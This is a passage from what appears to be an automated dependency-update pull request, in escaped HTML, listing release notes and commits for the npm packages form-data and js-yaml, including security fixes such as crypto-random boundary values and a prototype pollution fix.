href=\"https://github.com/form-data/form-data/commit/ddbc89b6d6d64f730bcb27cb33b7544068466a05\"\u003e\u003ccode\u003eddbc89b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/e351a97e9f6c57c74ffd01625e83b09de805d08a\"\u003e\u003ccode\u003ee351a97\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused script \u003ca href=\"https://github.com/form-data/form-data/commit/8f233664842da5bd605ce85541defc713d1d1e0a\"\u003e\u003ccode\u003e8f23366\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] add missing peer dep \u003ca href=\"https://github.com/form-data/form-data/commit/02ff026fda71f9943cfdd5754727c628adb8d135\"\u003e\u003ccode\u003e02ff026\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2fd5f61ebfb526cd015fb8e7b8b8c1add4a38872\"\u003e\u003ccode\u003e2fd5f61\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.2...v2.5.3\"\u003ev2.5.3\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003eObject.prototype.hasOwnProperty.call\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/6e682d4bd41de7e80de41e3c4ee10f23fcc3dd00\"\u003e\u003ccode\u003e6e682d4\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@types/node\u003c/code\u003e, \u003ccode\u003ebrowserify\u003c/code\u003e, \u003ccode\u003ecoveralls\u003c/code\u003e, \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003eformidable\u003c/code\u003e, \u003ccode\u003ein-publish\u003c/code\u003e, \u003ccode\u003ephantomjs-prebuilt\u003c/code\u003e, \u003ccode\u003epkgfiles\u003c/code\u003e, \u003ccode\u003epre-commit\u003c/code\u003e, \u003ccode\u003erequest\u003c/code\u003e, \u003ccode\u003etape\u003c/code\u003e, \u003ccode\u003etypescript\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/819f6b7a543306a891fca37c3a06d0ff4a734422\"\u003e\u003ccode\u003e819f6b7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOnly apps should have lockfiles \u003ca href=\"https://github.com/form-data/form-data/commit/b170ee2b22b4c695c363b811c0c553d2fb1bbd79\"\u003e\u003ccode\u003eb170ee2\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003ecombined-stream\u003c/code\u003e, \u003ccode\u003emime-types\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/6b1ca1dc7362a1b1c3a99a885516cca4b7eb817f\"\u003e\u003ccode\u003e6b1ca1d\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBumped version 2.5.3 \u003ca href=\"https://github.com/form-data/form-data/commit/9457283e1dce6122adc908fdd7442cfc54cabe7a\"\u003e\u003ccode\u003e9457283\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] pin \u003ccode\u003erequest\u003c/code\u003e which via \u003ccode\u003etough-cookie\u003c/code\u003e ^2.4 depends on \u003ccode\u003epsl\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/9dbe192be3db215eac4d9c0b980470a5c2c030c6\"\u003e\u003ccode\u003e9dbe192\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.1...v2.5.2\"\u003ev2.5.2\u003c/a\u003e - 2024-10-10\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/40de5a74209992979f6695d894c1d554ddb72f29\"\u003e\u003ccode\u003e40de5a7\u003c/code\u003e\u003c/a\u003e v2.5.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/026abe5c5c0489d8a2ccb59d5cfd14fb63078377\"\u003e\u003ccode\u003e026abe5\u003c/code\u003e\u003c/a\u003e [Fix] use proper dependency\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/10626c0a9b78c7d3fcaa51772265015ee0afc25c\"\u003e\u003ccode\u003e10626c0\u003c/code\u003e\u003c/a\u003e [meta] actually ensure the readme backup isn’t published\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/efe6c2693159084b18c58648e77203d1d810395b\"\u003e\u003ccode\u003eefe6c26\u003c/code\u003e\u003c/a\u003e v2.5.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/c97cfbed9eb6d2d4b5d53090f69ded4bf9fd8a21\"\u003e\u003ccode\u003ec97cfbe\u003c/code\u003e\u003c/a\u003e [Tests] Switch to newer v8 prediction library; enable node 24 testing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/0e93122358414942393d9c2dc434ae69e58be7c8\"\u003e\u003ccode\u003e0e93122\u003c/code\u003e\u003c/a\u003e [Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/b88316c94bb004323669cd3639dc8bb8262539eb\"\u003e\u003ccode\u003eb88316c\u003c/code\u003e\u003c/a\u003e [Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/b70869dad20175aad0230ad5f1d030fb76232df8\"\u003e\u003ccode\u003eb70869d\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/131ae5efa30b9c608add4faef3befb38aa2e1bf1\"\u003e\u003ccode\u003e131ae5e\u003c/code\u003e\u003c/a\u003e [Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/8bf2492e0555d41ff58fa04c91593af998f87a3c\"\u003e\u003ccode\u003e8bf2492\u003c/code\u003e\u003c/a\u003e [eslint] update linting config\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.1...v2.5.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~ljharb\"\u003eljharb\u003c/a\u003e, a new releaser for form-data since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepublish\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `form-data` from 4.0.0 to 4.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/releases\"\u003eform-data's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.5.2\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eBuffer.from\u003c/code\u003e and \u003ccode\u003eBuffer.alloc\u003c/code\u003e require node 4+\u003c/li\u003e\n\u003cli\u003enpmignore temporary build files (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003emove util.isArray to Array.isArray (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/564\"\u003e#564\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emigrate from travis to GHA\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/blob/master/CHANGELOG.md\"\u003eform-data's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.4...v2.5.5\"\u003ev2.5.5\u003c/a\u003e - 2025-07-18\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/10626c0a9b78c7d3fcaa51772265015ee0afc25c\"\u003e\u003ccode\u003e10626c0\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] use proper dependency \u003ca href=\"https://github.com/form-data/form-data/commit/026abe5c5c0489d8a2ccb59d5cfd14fb63078377\"\u003e\u003ccode\u003e026abe5\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.3...v2.5.4\"\u003ev2.5.4\u003c/a\u003e - 2025-07-17\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] update linting config \u003ca href=\"https://github.com/form-data/form-data/commit/8bf2492e0555d41ff58fa04c91593af998f87a3c\"\u003e\u003ccode\u003e8bf2492\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/b5101ad3d5f73cfd0143aae3735b92826fd731ea\"\u003e\u003ccode\u003eb5101ad\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/0e93122358414942393d9c2dc434ae69e58be7c8\"\u003e\u003ccode\u003e0e93122\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/b88316c94bb004323669cd3639dc8bb8262539eb\"\u003e\u003ccode\u003eb88316c\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/131ae5efa30b9c608add4faef3befb38aa2e1bf1\"\u003e\u003ccode\u003e131ae5e\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] Switch to newer v8 prediction library; enable node 24 testing \u003ca href=\"https://github.com/form-data/form-data/commit/c97cfbed9eb6d2d4b5d53090f69ded4bf9fd8a21\"\u003e\u003ccode\u003ec97cfbe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/97ac9c208be0b83faeee04bb3faef1ed3474ee4c\"\u003e\u003ccode\u003e97ac9c2\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/be99d4eea5ce47139c23c1f0914596194019d7fb\"\u003e\u003ccode\u003ebe99d4e\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/ddbc89b6d6d64f730bcb27cb33b7544068466a05\"\u003e\u003ccode\u003eddbc89b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/e351a97e9f6c57c74ffd01625e83b09de805d08a\"\u003e\u003ccode\u003ee351a97\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused script \u003ca href=\"https://github.com/form-data/form-data/commit/8f233664842da5bd605ce85541defc713d1d1e0a\"\u003e\u003ccode\u003e8f23366\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] add missing peer dep \u003ca href=\"https://github.com/form-data/form-data/commit/02ff026fda71f9943cfdd5754727c628adb8d135\"\u003e\u003ccode\u003e02ff026\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2fd5f61ebfb526cd015fb8e7b8b8c1add4a38872\"\u003e\u003ccode\u003e2fd5f61\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.2...v2.5.3\"\u003ev2.5.3\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003eObject.prototype.hasOwnProperty.call\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/6e682d4bd41de7e80de41e3c4ee10f23fcc3dd00\"\u003e\u003ccode\u003e6e682d4\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@types/node\u003c/code\u003e, \u003ccode\u003ebrowserify\u003c/code\u003e, \u003ccode\u003ecoveralls\u003c/code\u003e, \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003eformidable\u003c/code\u003e, \u003ccode\u003ein-publish\u003c/code\u003e, \u003ccode\u003ephantomjs-prebuilt\u003c/code\u003e, \u003ccode\u003epkgfiles\u003c/code\u003e, \u003ccode\u003epre-commit\u003c/code\u003e, \u003ccode\u003erequest\u003c/code\u003e, \u003ccode\u003etape\u003c/code\u003e, \u003ccode\u003etypescript\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/819f6b7a543306a891fca37c3a06d0ff4a734422\"\u003e\u003ccode\u003e819f6b7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOnly apps should have lockfiles \u003ca href=\"https://github.com/form-data/form-data/commit/b170ee2b22b4c695c363b811c0c553d2fb1bbd79\"\u003e\u003ccode\u003eb170ee2\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003ecombined-stream\u003c/code\u003e, \u003ccode\u003emime-types\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/6b1ca1dc7362a1b1c3a99a885516cca4b7eb817f\"\u003e\u003ccode\u003e6b1ca1d\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBumped version 2.5.3 \u003ca href=\"https://github.com/form-data/form-data/commit/9457283e1dce6122adc908fdd7442cfc54cabe7a\"\u003e\u003ccode\u003e9457283\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] pin \u003ccode\u003erequest\u003c/code\u003e which via \u003ccode\u003etough-cookie\u003c/code\u003e ^2.4 depends on \u003ccode\u003epsl\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/9dbe192be3db215eac4d9c0b980470a5c2c030c6\"\u003e\u003ccode\u003e9dbe192\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.1...v2.5.2\"\u003ev2.5.2\u003c/a\u003e - 2024-10-10\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/40de5a74209992979f6695d894c1d554ddb72f29\"\u003e\u003ccode\u003e40de5a7\u003c/code\u003e\u003c/a\u003e v2.5.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/026abe5c5c0489d8a2ccb59d5cfd14fb63078377\"\u003e\u003ccode\u003e026abe5\u003c/code\u003e\u003c/a\u003e [Fix] use proper dependency\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/10626c0a9b78c7d3fcaa51772265015ee0afc25c\"\u003e\u003ccode\u003e10626c0\u003c/code\u003e\u003c/a\u003e [meta] actually ensure the readme backup isn’t published\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/efe6c2693159084b18c58648e77203d1d810395b\"\u003e\u003ccode\u003eefe6c26\u003c/code\u003e\u003c/a\u003e v2.5.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/c97cfbed9eb6d2d4b5d53090f69ded4bf9fd8a21\"\u003e\u003ccode\u003ec97cfbe\u003c/code\u003e\u003c/a\u003e [Tests] Switch to newer v8 prediction library; enable node 24 testing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/0e93122358414942393d9c2dc434ae69e58be7c8\"\u003e\u003ccode\u003e0e93122\u003c/code\u003e\u003c/a\u003e [Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/b88316c94bb004323669cd3639dc8bb8262539eb\"\u003e\u003ccode\u003eb88316c\u003c/code\u003e\u003c/a\u003e [Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/b70869dad20175aad0230ad5f1d030fb76232df8\"\u003e\u003ccode\u003eb70869d\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/131ae5efa30b9c608add4faef3befb38aa2e1bf1\"\u003e\u003ccode\u003e131ae5e\u003c/code\u003e\u003c/a\u003e [Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/8bf2492e0555d41ff58fa04c91593af998f87a3c\"\u003e\u003ccode\u003e8bf2492\u003c/code\u003e\u003c/a\u003e [eslint] update linting config\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.1...v2.5.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~ljharb\"\u003eljharb\u003c/a\u003e, a new releaser for form-data since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepublish\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca 